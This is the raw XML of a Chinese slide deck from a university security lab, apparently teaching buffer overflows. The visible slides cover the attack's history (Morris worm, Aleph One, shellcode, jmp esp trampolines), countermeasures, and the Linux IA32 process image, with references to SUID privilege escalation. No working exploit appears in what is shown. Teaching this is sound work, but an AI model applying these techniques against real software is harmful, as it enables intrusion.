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ags/tag1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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347" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="348" r:id="rId4"/>
    <p:sldId id="641" r:id="rId5"/>
    <p:sldId id="531" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="532" r:id="rId8"/>
    <p:sldId id="533" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="535" r:id="rId12"/>
    <p:sldId id="536" r:id="rId13"/>
    <p:sldId id="537" r:id="rId14"/>
    <p:sldId id="643" r:id="rId15"/>
    <p:sldId id="264" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="539" r:id="rId18"/>
    <p:sldId id="540" r:id="rId19"/>
    <p:sldId id="541" r:id="rId20"/>
    <p:sldId id="594" r:id="rId21"/>
    <p:sldId id="595" r:id="rId22"/>
    <p:sldId id="596" r:id="rId23"/>
    <p:sldId id="597" r:id="rId24"/>
    <p:sldId id="598" r:id="rId25"/>
    <p:sldId id="599" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="645" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="600" r:id="rId30"/>
    <p:sldId id="295" r:id="rId31"/>
    <p:sldId id="601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3" r:id="rId42"/>
    <p:sldId id="296" r:id="rId43"/>
    <p:sldId id="647" r:id="rId44"/>
    <p:sldId id="297" r:id="rId45"/>
    <p:sldId id="614" r:id="rId46"/>
    <p:sldId id="615" r:id="rId47"/>
    <p:sldId id="618" r:id="rId48"/>
    <p:sldId id="625" r:id="rId49"/>
    <p:sldId id="626" r:id="rId50"/>
    <p:sldId id="627" r:id="rId51"/>
    <p:sldId id="628" r:id="rId52"/>
    <p:sldId id="629" r:id="rId53"/>
    <p:sldId id="632" r:id="rId54"/>
    <p:sldId id="633" r:id="rId55"/>
    <p:sldId id="350" r:id="rId56"/>
    <p:sldId id="634" r:id="rId57"/>
    <p:sldId id="635" r:id="rId58"/>
    <p:sldId id="636" r:id="rId59"/>
    <p:sldId id="637" r:id="rId60"/>
    <p:sldId id="651" r:id="rId61"/>
    <p:sldId id="649" r:id="rId62"/>
    <p:sldId id="650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99" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61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C0392-4E4B-490C-A26A-80A33DCC3D71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A6DE4-41E5-4752-B3CD-3B72BF866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quanke.com/post/id/8697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xiangminghate/article/details/53333710?utm_medium=distribute.wap_relevant.none-task-blog-BlogCommendFromBaidu-7.nonecase&amp;depth_1-utm_source=distribute.wap_relevant.none-task-blog-BlogCommendFromBaidu-7.nonecas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6DE4-41E5-4752-B3CD-3B72BF8666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SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>提权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https://www.anquanke.com/post/id/86979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关于堆栈保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https://blog.csdn.net/yuanbinquan/article/details/51778269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6DE4-41E5-4752-B3CD-3B72BF8666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1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关于进程跳转 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp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，解释的比较清楚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https://blog.csdn.net/lixiangminghate/article/details/53333710?utm_medium=distribute.wap_relevant.none-task-blog-BlogCommendFromBaidu-7.nonecase&amp;depth_1-utm_source=distribute.wap_relevant.none-task-blog-BlogCommendFromBaidu-7.nonecase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6DE4-41E5-4752-B3CD-3B72BF8666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4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6DE4-41E5-4752-B3CD-3B72BF86667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命令一样，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命令也用于调试阶段查看某个变量或表达式的值，它们的区别是，使用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命令查看变量或表达式的值，每当程序暂停执行（例如单步执行）时，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调试器都会自动帮我们打印出来，而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命令则不会。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A6DE4-41E5-4752-B3CD-3B72BF86667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2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B58-0E6F-4135-A1BB-6F54BFEB8AB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1036-562A-4163-8A3C-2D45F00946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529555" y="2781702"/>
            <a:ext cx="7084464" cy="816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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2529555" y="3674276"/>
            <a:ext cx="7084464" cy="486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22" y="613138"/>
            <a:ext cx="1991555" cy="1991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375"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5" smtClean="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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22860">
              <a:lnSpc>
                <a:spcPts val="131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B58-0E6F-4135-A1BB-6F54BFEB8AB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1036-562A-4163-8A3C-2D45F00946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34006" y="364304"/>
            <a:ext cx="4860940" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" kern="1200" spc="500" baseline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62975"/>
            <a:ext cx="10515600" cy="5022866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="358775" indent="-358775" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/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indent="-346075" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–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just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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B58-0E6F-4135-A1BB-6F54BFEB8AB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1036-562A-4163-8A3C-2D45F00946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904825"/>
            <a:ext cx="12192000" cy="2872509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61845" y="3426475"/>
            <a:ext cx="6130155" cy="590931"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US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7428" y="2321111"/>
            <a:ext cx="1313597" cy="434677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5400" b="1" kern="12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2475346"/>
            <a:ext cx="12192000" cy="542052"/>
            <a:chOff x="0" y="2475346"/>
            <a:chExt cx="12192000" cy="542052"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2858264" y="2475346"/>
              <a:ext cx="9333736" cy="54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475346"/>
              <a:ext cx="1380836" cy="542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7753" y="2494178"/>
              <a:ext cx="757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zh-CN" altLang="en-US" sz="28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95836" y="2485034"/>
              <a:ext cx="1135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</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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62975"/>
            <a:ext cx="5181600" cy="5013989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zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="358775" lvl="0" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="1" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第二级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="2" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第三级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="3" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第四级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="4" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr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62976"/>
            <a:ext cx="5181600" cy="501398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zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="zh-CN" altLang="en-US" baseline="0" smtClean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just">
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="358775" lvl="0" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="1" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第二级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="2" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第三级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="3" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第四级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="4" indent="-358775">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
            </a:pPr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9B58-0E6F-4135-A1BB-6F54BFEB8ABE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1036-562A-4163-8A3C-2D45F00946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34006" y="372862"/>
            <a:ext cx="4698570" cy="355107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" kern="1200" spc="500" baseline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D805-4244-44B7-B0BD-92CEEC08B09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9613-7D7C-4F0A-B07F-B848809819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22" y="613138"/>
            <a:ext cx="1991555" cy="19915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046725" y="6399488"/>
            <a:ext cx="40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网络与信息安全研究所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tencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>BINARY LAB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Stencil" panose="040409050D0802020404" pitchFamily="82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84881" y="2773680"/>
            <a:ext cx="5516879" cy="10160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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05201" y="2862616"/>
            <a:ext cx="542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网络安全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484881" y="4241766"/>
            <a:ext cx="5516879" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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88079" y="3780101"/>
            <a:ext cx="509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 defTabSz="914400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00457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 SECURITY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000"/>
    </mc:Choice>
    <mc:Fallback xmlns=""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717320" y="355600"/>
            <a:ext cx="9474679" cy="378460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" y="355514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367281" y="314603"/>
            <a:ext cx="2146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4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发展历史</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886017" y="1376756"/>
            <a:ext cx="9819364" cy="457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sz="2400" dirty="0" smtClean="0"/>
              <a:t>作为对目标进程的一种攻击方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>，早在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1980</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年代初期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sz="2400" dirty="0" smtClean="0"/>
              <a:t>就有人开始讨论缓冲区溢出攻击了</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0"/>
              <a:t>但真正付诸实践并且导致严重后果的最早事件是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1988年的Morris蠕虫事件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>Morris蠕虫对Unix系统中fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0"/>
              <a:t>的缓冲区溢出漏洞进行攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>，导致了6000多台机器被感染，损失 在$100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t> 000(10万)至$10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t> 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>000(1千万)之间。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>Morris蠕虫事件引发了工业界和学术界对缓冲区溢出漏洞的关注。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626360" y="355600"/>
            <a:ext cx="9565640" cy="378460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" y="355514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384535" y="327274"/>
            <a:ext cx="2146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4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发展历史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19508" y="1203325"/>
            <a:ext cx="10299941" cy="510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1989年以来，有大量的研究人员对Unix系统下的缓冲区溢出漏洞进行研究并取得了丰富的研究成果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>其中比较著名的有Spafiord</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>自Lopht</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  heavy Industries的Mudge。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>1996年，Aleph One在Phrack杂志第49期发表的论文(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smashing The Stack For Fun And Profit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>)详细描述了Linux系统中栈的结构和如何利用基于栈的缓冲区溢出。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Aleph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>的论文是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关于缓冲区溢出攻击的开山之作</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>，作为经典论文至今仍然被众多人研读。Aleph</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>给出了如何写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的代码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>并给这段代码赋予</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的名称。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626360" y="355600"/>
            <a:ext cx="9565640" cy="378460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" y="355514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306595" y="314603"/>
            <a:ext cx="2146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4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发展历史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892079" y="1285180"/>
            <a:ext cx="10537921" cy="511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所谓编写Shellcode，就是编译一段使用系统调用的简单的C程序，通过调试器抽取汇编代码，并根据需要修改这段汇编代码使之实现攻击者的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>受到Aleph One的启发，在Internet上出现了众多的关于缓冲区溢出攻击的论文，以及关于避免缓冲区溢出攻击的安全编程方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>也有研究者分析了Unix类操作系统的一些安全属性，如SUID程序、Linux栈结构和功能等，并</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>研究出了一些抵抗缓冲区溢出攻击的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>，如地址随机化技术、栈不可执行技术和堆栈保护(Stack Guard)技术等。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626360" y="355600"/>
            <a:ext cx="9565640" cy="378460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" y="355514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375908" y="314603"/>
            <a:ext cx="2146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4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发展历史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71269" y="1224999"/>
            <a:ext cx="10446588" cy="468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在1998年之前，人们认为Windows系统虽然存在缓冲区溢出漏洞，但是无法利用这些漏洞执行攻击者的代码，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其根本原因就在于Windows系统中的进程堆栈地址的不固定</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。然而，1998年出现的利用动态链接库实现进程跳转的技术改变了这一观念。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进程跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>技术巧妙利用了动态链接库中的call esp 或jmp esp指令，使溢出后的执行流程从动态链接库跳转到攻击者可控制的缓冲区，这样就可以执行攻击者的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>缓冲区溢出攻击技术已经相当成熟，是入侵（渗透）攻击的主要技术手段之一。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006" y="346016"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" spc="5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350008" y="336652"/>
            <a:ext cx="9841992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36652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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="1738593"/>
            <a:ext cx="4430395" cy="707887"/>
            <a:chOff x="1598315" y="1418185"/>
            <a:chExt cx="4430396" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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2066310" y="1418185"/>
              <a:ext cx="3962401" cy="506729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/>
              <a:r>
                <a:rPr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缓冲区溢出概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="2771117"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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Linux IA32 的进程映像</a:t>
              </a:r>
              <a:endPara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13" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="3794116"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出的原理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1307460" y="4839340"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出攻击技术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3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7192" y="363868"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr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Linux IA32 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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uFillTx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3042" y="363855"/>
            <a:ext cx="8128958" cy="378460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" y="364029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bject 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613188" y="1357979"/>
            <a:ext cx="10489008" cy="497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运行于Intel 32 位CPU （ 或兼容Intel CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>如AMD）的Linux操作系统称为Linux IA32。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>32位的 Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>被广泛应用于桌面操作系统中，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>常用的操作系统有Fedora-i386和Ubuntu-i386</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>它们均基于IA32架构。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>环境：32位的ubuntu16.04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>注意：实验环境及配置不同，则观察到的实验结果也不完全相同</a:t>
            </a:r>
            <a:r>
              <a:rPr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362136" y="247949"/>
              <a:ext cx="9829864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787892" y="295059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进程映像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87892" y="1375997"/>
            <a:ext cx="10383316" cy="43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为了进行缓冲区溢出攻击，必须分析目标程序的进程映像。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进程映像</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>是指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进程在内存中的分布</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>可执行程序的进程映像与</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统及版本</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>有关，也与生成该程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编译器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>有关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>进程有4个主要的内存区：代码区、数据区、堆栈区和环境变量区。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748551" y="295059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进程映像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55" y="940871"/>
            <a:ext cx="536829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例程</a:t>
            </a:r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mem_distribute.c</a:t>
            </a:r>
            <a:endParaRPr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uFillTx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903958" y="1488413"/>
            <a:ext cx="7413233" cy="420179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&lt;stdio.h&gt;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2873375">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="23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&lt;string.h&gt;  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2873375">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="230"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1" smtClean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fun1(int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a, int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){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 err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>a+b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fun2(int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a, int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){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a*b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3228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x=10,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y,</a:t>
            </a:r>
            <a:r>
